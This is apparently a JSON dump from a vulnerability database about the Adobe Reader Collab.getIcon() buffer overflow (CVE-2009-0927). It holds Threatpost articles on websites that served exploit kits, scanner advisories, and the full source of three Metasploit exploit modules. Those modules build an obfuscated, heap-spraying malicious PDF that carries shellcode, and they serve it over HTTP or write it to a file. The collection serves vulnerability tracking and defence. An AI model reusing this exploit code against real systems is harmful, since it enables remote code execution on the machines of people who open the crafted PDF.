**updates.exe** \nhappens in a similar manner to that described earlier.\n\nThe Websense report says that the exploit is still active on the PHP-Nuke site right now. PHP-Nuke originally was an open-source platform, but is now a commercial product. The main site, however, still serves as a resource page for users and developers. \n", "modified": "2018-08-15T12:49:42", "published": "2010-05-07T15:37:38", "id": "THREATPOST:F74B2BA1E612E4169F1938346DB9CC35", "href": "https://threatpost.com/main-php-nuke-site-compromised-050710/73938/", "type": "threatpost", "title": "Main PHP-Nuke Site Compromised", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:40", "bulletinFamily": "info", "description": "**Update:** _Aaron Harison, president of the Center for American Freedom, told Threatpost this morning that the issue has been resolved and the site is no longer serving malware. _** **\n\nHackers have latched on to the NSA surveillance story\u2014literally.\n\nA news story on the outing of whistleblower Edward Snowden posted to the Washington Free Beacon is serving malware redirecting visitors to a malicious site where more malware awaits. The Free Beacon site remains infected, according to Invincea researchers, who said they have contacted the news organization about the attack. The story is being linked to by the popular Drudge Report and it\u2019s likely to have snared a pretty good number of victims so far.\n\nThe attack on the Free Beacon is similar to a previous [watering hole attack carried out against a number of other Washington, D.C.-based media outlets](<http://threatpost.com/d-c-media-sites-hacked-serving-fake-av/>), including radio station WTOP, Federal News Radio and the site of technology blogger John Dvorak. Invincea researcher Eddie Mitchell wrote on the company\u2019s blog that several other Free Beacon pages are also serving javascript, including the site\u2019s main index page. The javascript drops an iframe that sends traffic offsite to a page hosting the Fiesta Exploit Kit.\n\n\u201cThis exploit appears to be the same as used against other media sites to infect readers of these websites and part of a concerted campaign against media sites to infect their visitors by exploiting vulnerabilities in Java,\u201d Mitchell wrote. \u201c\n\nMitchell cautions that this attack isn\u2019t being detected yet by security companies because signatures associated with the attack are different from previous campaigns.\n\nThe Free Beacon attack is infecting users with the [ZeroAccess rootkit](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/>), as well as scareware. ZeroAccess is a virulent [peer-to-peer botnet](<http://threatpost.com/number-of-peer-to-peer-botnets-grows-5x/>) that has been folded into a number of commercial exploit kits including Blackhole. The malware makes an outbound communication requests to a number of command and control servers including e-zeeinternet[.]com, cinnamyn[.]com and twinkcam[.]net, from where the additional malware is loaded onto victim machines.\n\nA little more than a month ago, the campaigns against WTOP and sister station Federal News Radio were discovered. The exploits targeted Java and Adobe plug-ins and were used to spread scareware. Content on both stations is heavily political and the attacks could have been a jumping off point for a larger attack against federal employees who use the site as a resource. Unlike other watering hole attacks that lead to espionage campaigns against activists or political leaders, this one was serving malware usually associated with the cybercrime.\n\nThe Dvorak site was also attacked a month ago and malware was discovered on the site\u2019s [WordPress configuration files](<http://threatpost.com/hackers-using-brute-force-attacks-harvest-wordpress-sites-041513/>). Invincea said at the time that it used Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. The browser was pulling a Java app from the attacker\u2019s site and connecting to one of two Russian domains downloading Amsecure malware, which is part of the Kazy malware family, which is known for ransomware and scareware attacks. Three Java and Reader exploits were discovered on the Dvorak site: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. These exploits lead to landing page hosting the Black Hole exploit kit and the Amsecure attacks.\n", "modified": "2013-06-12T16:59:18", "published": "2013-06-10T16:17:14", "id": "THREATPOST:988117842525F1F414002817E6166A11", "href": "https://threatpost.com/nsa-whistleblower-article-redirects-to-malware/100930/", "type": "threatpost", "title": "Free Beacon Article Redirects to ZeroAccess Rootkit, Fake AV", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:40", "bulletinFamily": "info", "description": "[](<https://threatpost.com/popular-sports-site-goalcom-serves-malware-050311/>)Goal.com, a popular football (aka \u201csoccer\u201d for all us Yanks) news site was hacked and found serving malware via drive-by-downloads between April 27 and 28, according to a post by Web security firm Armorize.\n\nIn an analysis of the attack, Armorize \nresearcher Wayne Huang suggests that a hacker specifically targeted and \ncompromised Goal.com through a back-door that allowed the attacker to \nmanipulate the site\u2019s content at will. Researchers at Armorize said the attacks appear to be specific to Goal.com, which ranks 379th on Alexa.com\u2019s list of the world\u2019s top Web sites. That suggests the compromise is not part of a mass SQL injection campaign.\n\nAccording to the [report](<http://blog.armorize.com/2011/05/goalcom-serving-malware.html>), Goal.com was detected on April 27 and 28, 2011 serving up an iframe \nattack that forwarded visitors to a rogue domain in the .cc top level \ndomain (TLD). That redirect was the first in a chain of events that \nresulted in the delivery of a known exploit pack, g01pack that targets \nattacks at the specific operating system and browser version the \nGoal.com visitor is using. After exploiting the user\u2019s browser, further malware, including a Trojan horse program were downloaded to the victim\u2019s computer. \n\nThe \nnumber of users compromised after they visited Goal.com isn\u2019t known. \nThe site receives anywhere between 215,000 and 232,000 daily unique page \nviews, according to [alexa.com](<http://www.alexa.com/siteinfo/goal.com>).\n\nAs is often the case, the domains used to deliver the malware were not identified by AV products as malicious or blacklisted by Google\u2019s SafeBrowsing feature, a fact that Huang claims fortifies the argument that these are targeted attacks.\n\nAccording \nto the post, Armorize scanners became aware of the attack when the \nhacker responsible started testing injections at Goal.com. The browser \nexploits used during the test were CVE-2010-1423, a Java vulnerability, \nCVE-2010-1885 (Microsoft\u2019s Help Center, as well as CVE-2009-0927 for \nPDF, and CVE-2006-0003 affecting Microsoft\u2019s MDAC.\n\nThe attacker used the go1pack exploit kit, which has a fake admin page used as a honeynet \nfor researchers, allowing the attacker to keep track of anyone \nattempting to research his work. The exploit codes were also mutated to \navoid further detection.\n\nAttacks such as this one represent a trend in malware distribution. Security researchers have noted for some time that reputable Web sites are [high value targets for online scammers](<https://threatpost.com/legitimate-sites-fertile-ground-malware-091509/>), who want to take advantage of their large visitor traffic and high search engine ranking. In February, 2010, Kaspersky Lab researchers reported that [one in every 150 legitimate Web sites was hosting malicious content,](<https://threatpost.com/one-every-150-legitimate-sites-infected-malware-020310/>) [leveraging holes ](<https://threatpost.com/hartford-hacked-040711/>)in [legitimate sites](<https://threatpost.com/education-goverment-sites-still-serving-scammers-months-later-041411/>) to [push malware to their unsuspecting guests](<https://threatpost.com/malicious-ads-serving-malware-spotify-users-032511/>).\n", "modified": "2013-04-17T20:08:50", "published": "2011-05-03T19:05:02", "id": "THREATPOST:F143FEE5D0268A8FD7B954FDAD0944A7", "href": "https://threatpost.com/popular-sports-site-goalcom-serves-malware-050311/75196/", "type": "threatpost", "title": "Popular Sports Site Goal.com Serves Malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:35", "bulletinFamily": "info", "description": "[](<https://threatpost.com/pbs-website-compromised-used-serve-exploits-092309/>)Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits.\n\nAccording to researchers at Purewire, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe.\n\nThe malicious JavaScript was found on the \u201cCurious George\u201d page that provides content on the popular animation series.\n\nA look at the code on the hijacked site shows malicious activity coming from a third-party .info domain.\n\nThe URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader ([CVE-2008-2992](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992>), [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>), and [CVE-2007-5659](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659>)), AOL Radio AmpX ([CVE-2007-6250](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6250>)), AOL SuperBuddy ([CVE-2006-5820](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5820>)) and Apple QuickTime ([CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>)).\n\nPurewire said the exploit site is part of a malware campaign that includes tens of similar Web sites hosted off of a handful of common IP addresses.\n\nRead [the Purewire blog for more information](<http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits>) on this attack.\n\nA representative for PBS.org tells me the malicious code has been removed from the site.\n", "modified": "2013-04-17T16:39:50", "published": "2009-09-23T22:41:03", "id": "THREATPOST:EF67C4CADC97C245A3B46788F85E3A8A", "href": "https://threatpost.com/pbs-website-compromised-used-serve-exploits-092309/72217/", "type": "threatpost", "title": "PBS Website Compromised, Used to Serve Exploits", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-02T04:15:47", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.\n", "modified": "2017-07-24T13:26:21", "published": "2009-03-28T07:40:29", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_GETICON", "href": "", "type": "metasploit", "title": "Adobe Collab.getIcon() Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/pdf'\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'MC',\n 'Didier Stevens <didier.stevens[at]gmail.com>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2009-0927' ],\n [ 'OSVDB', '53647' ],\n [ 'ZDI', '09-014' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => 'true',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # test results (on Windows XP SP3)\n # reader 7.0.5 - no trigger\n # reader 7.0.8 - no trigger\n # reader 7.0.9 - no trigger\n # reader 7.1.0 - no trigger\n # reader 7.1.1 - reported not vulnerable\n # reader 8.0.0 - works\n # reader 8.1.2 - works\n # reader 8.1.3 - reported not vulnerable\n # reader 9.0.0 - works\n # reader 9.1.0 - reported not vulnerable\n [ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\n ],\n 'DisclosureDate' => 'Mar 24 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Make some nops\n nops = Rex::Text.to_unescape(make_nops(4))\n\n # Randomize variables\n rand1 = rand_text_alpha(rand(100) + 1)\n rand2 = rand_text_alpha(rand(100) + 1)\n rand3 = rand_text_alpha(rand(100) + 1)\n rand4 = rand_text_alpha(rand(100) + 1)\n rand5 = rand_text_alpha(rand(100) + 1)\n rand6 = rand_text_alpha(rand(100) + 1)\n rand7 = rand_text_alpha(rand(100) + 1)\n rand8 = rand_text_alpha(rand(100) + 1)\n rand9 = rand_text_alpha(rand(100) + 1)\n rand10 = rand_text_alpha(rand(100) + 1)\n rand11 = rand_text_alpha(rand(100) + 1)\n rand12 = rand_text_alpha(rand(100) + 1)\n\n script = %Q|\n var #{rand1} = unescape(\"#{shellcode}\");\n var #{rand2} =\"\";\n for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\");\n #{rand4} = #{rand2} + #{rand1};\n #{rand5} = unescape(\"#{nops}\");\n #{rand6} = 20;\n #{rand7} = #{rand6}+#{rand4}.length\n while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\n #{rand8} = #{rand5}.substring(0, #{rand7});\n #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\n while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\n #{rand10} = new Array();\n for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\n var #{rand12} = unescape(\"%0a\");\n while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\n #{rand12} = \"N.\"+#{rand12};\n Collab.getIcon(#{rand12});\n |\n\n # Create the pdf\n #pdf = make_pdf(script)\n pdf = create_pdf(script)\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_geticon.rb"}, {"lastseen": "2019-11-01T05:48:55", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.\n", "modified": "2017-10-05T21:44:36", "published": "2009-03-28T07:40:29", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_GETICON", "href": "", "type": "metasploit", "title": "Adobe Collab.getIcon() Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'MC',\n 'Didier Stevens <didier.stevens[at]gmail.com>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2009-0927' ],\n [ 'OSVDB', '53647' ],\n [ 'ZDI', '09-014' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-04.html']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # test results (on Windows XP SP3)\n # reader 7.0.5 - no trigger\n # reader 7.0.8 - no trigger\n # reader 7.0.9 - no trigger\n # reader 7.1.0 - no trigger\n # reader 7.1.1 - reported not vulnerable\n # reader 8.0.0 - works\n # reader 8.1.2 - works\n # reader 8.1.3 - reported not vulnerable\n # reader 9.0.0 - works\n # reader 9.1.0 - reported not vulnerable\n [ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\n ],\n 'DisclosureDate' => 'Mar 24 2009',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n return if ((p = regenerate_payload(cli)) == nil)\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Make some nops\n nops = Rex::Text.to_unescape(make_nops(4))\n\n # Randomize variables\n rand1 = rand_text_alpha(rand(100) + 1)\n rand2 = rand_text_alpha(rand(100) + 1)\n rand3 = rand_text_alpha(rand(100) + 1)\n rand4 = rand_text_alpha(rand(100) + 1)\n rand5 = rand_text_alpha(rand(100) + 1)\n rand6 = rand_text_alpha(rand(100) + 1)\n rand7 = rand_text_alpha(rand(100) + 1)\n rand8 = rand_text_alpha(rand(100) + 1)\n rand9 = rand_text_alpha(rand(100) + 1)\n rand10 = rand_text_alpha(rand(100) + 1)\n rand11 = rand_text_alpha(rand(100) + 1)\n rand12 = rand_text_alpha(rand(100) + 1)\n randnop = rand_text_alpha(rand(100) + 1)\n\n script = %Q|\n var #{rand1} = unescape(\"#{shellcode}\");\n var #{rand2} =\"\";\n var #{randnop} = \"#{nops}\";\n for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{randnop}\");\n #{rand4} = #{rand2} + #{rand1};\n #{rand5} = unescape(#{randnop});\n #{rand6} = 20;\n #{rand7} = #{rand6}+#{rand4}.length\n while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\n #{rand8} = #{rand5}.substring(0, #{rand7});\n #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\n while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\n #{rand10} = new Array();\n for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\n var #{rand12} = unescape(\"%0a\");\n while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\n #{rand12} = \"N.\"+#{rand12};\n Collab.getIcon(#{rand12});\n |\n\n # Create the pdf\n pdf = make_pdf(script)\n\n print_status(\"Sending #{self.name}\")\n\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })\n\n handler(cli)\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n def make_pdf(js)\n\n xref = []\n eol = \"\\x0d\\x0a\"\n endobj = \"endobj\" << eol\n\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<</Type/Catalog/Outlines \") << io_ref(2) << n_obfu(\"/Pages \") << io_ref(3) << n_obfu(\"/OpenAction \") << io_ref(5) << \">>\" << endobj\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<</Type/Outlines/Count 0>>\") << endobj\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Pages/Kids[\") << io_ref(4) << n_obfu(\"]/Count 1>>\") << endobj\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Page/Parent \") << io_ref(3) << n_obfu(\"/MediaBox[0 0 612 792]>>\") << endobj\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(6) + \">>\" << endobj\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(6) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n pdf << \"trailer\" << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n pdf << \"%%EOF\" << eol\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_geticon.rb"}], "canvas": [{"lastseen": "2019-05-29T17:19:23", "bulletinFamily": "exploit", "description": "**Name**| acrobat_js4 \n---|--- \n**CVE**| CVE-2009-0927 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| acrobat_js4 \n**Notes**| CVE Name: CVE-2009-0927 \nVersionsAffected: Acrobat Reader &lt;=8.1.2 and &lt;=9.0 \nRepeatability: \nReferences: http://www.adobe.com/support/security/bulletins/apsb09-04.html \nDate public: 03/24/2009 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927 \n\n", "modified": "2009-03-19T10:30:00", "published": "2009-03-19T10:30:00", "id": "ACROBAT_JS4", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/acrobat_js4", "type": "canvas", "title": "Immunity Canvas: ACROBAT_JS4", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "description": "Added: 03/27/2009 \nCVE: [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>) \nBID: [34169](<http://www.securityfocus.com/bid/34169>) \n\n\n### Background\n\n[Adobe Acrobat](<http://www.adobe.com/products/acrobat/>) is software for creating PDF documents. [Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a PDF file which calls the JavaScript getIcon method with a long, specially crafted argument. \n\n### Resolution\n\nUpgrade to Adobe Acrobat 7.1.1, 8.1.4, or 9.1 or higher as described in [APSB09-04](<http://www.adobe.com/support/security/bulletins/apsb09-04.html>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-014/> \n\n\n### Limitations\n\nExploit works on Adobe Acrobat 9.0 and requires a user to load the exploit file in Adobe Acrobat. \n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2009-03-27T00:00:00", "published": "2009-03-27T00:00:00", "id": "SAINT:3FD55356C59C08B007A70159ACFB7A63", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_acrobat_javascript_geticon", "title": "Adobe Acrobat JavaScript getIcon method buffer overflow ", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "description": "Added: 03/27/2009 \nCVE: [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>) \nBID: [34169](<http://www.securityfocus.com/bid/34169>) \n\n\n### Background\n\n[Adobe Acrobat](<http://www.adobe.com/products/acrobat/>) is software for creating PDF documents. [Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a PDF file which calls the JavaScript getIcon method with a long, specially crafted argument. \n\n### Resolution\n\nUpgrade to Adobe Acrobat 7.1.1, 8.1.4, or 9.1 or higher as described in [APSB09-04](<http://www.adobe.com/support/security/bulletins/apsb09-04.html>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-014/> \n\n\n### Limitations\n\nExploit works on Adobe Acrobat 9.0 and requires a user to load the exploit file in Adobe Acrobat. \n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2009-03-27T00:00:00", "published": "2009-03-27T00:00:00", "id": "SAINT:AFE3E3BE3BB3652683F3F01263CCE593", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_acrobat_javascript_geticon", "title": "Adobe Acrobat JavaScript getIcon method buffer overflow ", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "description": "Added: 03/27/2009 \nCVE: [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>) \nBID: [34169](<http://www.securityfocus.com/bid/34169>) \n\n\n### Background\n\n[Adobe Acrobat](<http://www.adobe.com/products/acrobat/>) is software for creating PDF documents. [Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a PDF file which calls the JavaScript getIcon method with a long, specially crafted argument. \n\n### Resolution\n\nUpgrade to Adobe Acrobat 7.1.1, 8.1.4, or 9.1 or higher as described in [APSB09-04](<http://www.adobe.com/support/security/bulletins/apsb09-04.html>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-014/> \n\n\n### Limitations\n\nExploit works on Adobe Acrobat 9.0 and requires a user to load the exploit file in Adobe Acrobat. \n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2009-03-27T00:00:00", "published": "2009-03-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_acrobat_javascript_geticon", "id": "SAINT:654B00AF52A01A1D29119E4E92043279", "title": "Adobe Acrobat JavaScript getIcon method buffer overflow ", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:36", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83139/Adobe-Collab.getIcon-Buffer-Overflow.html", "id": "PACKETSTORM:83139", "type": "packetstorm", "title": "Adobe Collab.getIcon() Buffer Overflow", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Collab.getIcon() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional \n< 8.1.4. By creating a specially crafted pdf that a contains malformed Collab.getIcon() \ncall, an attacker may be able to execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', \n'jduck <metasploit[at]qoop.org>', ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2009-0927' ], \n[ 'OSVDB', '53647' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Adobe Reader v8.1.4 (Windows XP SP3 English)', { 'Ret' => '' } ], \n], \n'DisclosureDate' => 'Mar 24 2009', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), \n], self.class) \n \nend \n \ndef exploit \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Make some nops \nnops = Rex::Text.to_unescape(make_nops(4)) \n \n# Randomize variables \nrand1 = rand_text_alpha(rand(100) + 1) \nrand2 = rand_text_alpha(rand(100) + 1) \nrand3 = rand_text_alpha(rand(100) + 1) \nrand4 = rand_text_alpha(rand(100) + 1) \nrand5 = rand_text_alpha(rand(100) + 1) \nrand6 = rand_text_alpha(rand(100) + 1) \nrand7 = rand_text_alpha(rand(100) + 1) \nrand8 = rand_text_alpha(rand(100) + 1) \nrand9 = rand_text_alpha(rand(100) + 1) \nrand10 = rand_text_alpha(rand(100) + 1) \nrand11 = rand_text_alpha(rand(100) + 1) \nrand12 = rand_text_alpha(rand(100) + 1) \n \nscript = %Q| \nvar #{rand1} = unescape(\"#{shellcode}\"); \nvar #{rand2} =\"\"; \nfor (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\"); \n#{rand4} = #{rand2} + #{rand1}; \n#{rand5} = unescape(\"#{nops}\"); \n#{rand6} = 20; \n#{rand7} = #{rand6}+#{rand4}.length \nwhile (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5}; \n#{rand8} = #{rand5}.substring(0, #{rand7}); \n#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7}); \nwhile(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8}; \n#{rand10} = new Array(); \nfor (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4}; \nvar #{rand12} = unescape(\"%09\"); \nwhile(#{rand12}.length < 0x4000) #{rand12}+=#{rand12}; \n#{rand12} = \"N.\"+#{rand12}; \nCollab.getIcon(#{rand12}); \n| \n \n# Create the pdf \npdf = make_pdf(script) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(pdf) 